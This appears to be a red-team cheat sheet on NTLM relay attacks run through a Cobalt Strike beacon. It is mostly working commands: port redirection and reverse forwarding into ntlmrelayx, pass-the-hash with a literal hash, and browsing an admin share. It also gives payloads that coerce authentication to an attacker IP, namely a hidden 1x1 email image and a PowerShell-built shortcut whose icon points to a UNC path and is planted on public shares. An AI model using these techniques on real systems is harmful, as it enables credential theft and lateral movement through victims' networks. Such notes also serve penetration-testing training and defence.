NTLM Relay

1. Use a driver to redirect traffic destined for port 445 to another port (e.g. 8445) that we can bind to.

2. Use a reverse port forward on the port the SMB traffic is being redirected to. This will tunnel the SMB traffic over the C2 channel to our Team Server.

3. The tool of choice (ntlmrelayx) will be listening for SMB traffic on the Team Server.

4. A SOCKS proxy is required to allow ntlmrelayx to send traffic back into the target network.

beacon> PortBender redirect 445 8445
beacon> rportfwd 8445 10.10.5.120 445
beacon> socks 1080

root@kali:~# proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://10.10.17.68 -smb2support --no-http-server --no-wcf-server

beacon> pth .\Administrator b423cdd3ad21718de4490d9344afef72
beacon> ls \\srv-2\c$

beacon> jobkill 0
beacon> kill 1240

NTLM Authentication

1x1 Images in Emails

If you have control over an inbox, you can send emails that have an invisible 1x1 image embedded in the body. When the recipients view the email in their mail client, such as Outlook, it will attempt to download the image over the UNC path and trigger an NTLM authentication attempt.

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

Windows Shortcuts

A Windows shortcut can have multiple properties including a target, working directory and an icon. Creating a shortcut with the icon property pointing to a UNC path will trigger an NTLM authentication attempt when it's viewed in Explorer (it doesn't even have to be clicked).

The easiest way to create a shortcut is with PowerShell.

$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("\\dc-2\software\test.lnk")
$shortcut.IconLocation = "\\10.10.17.231\test.ico"
$shortcut.Save()

A good location for these is on publicly readable shares.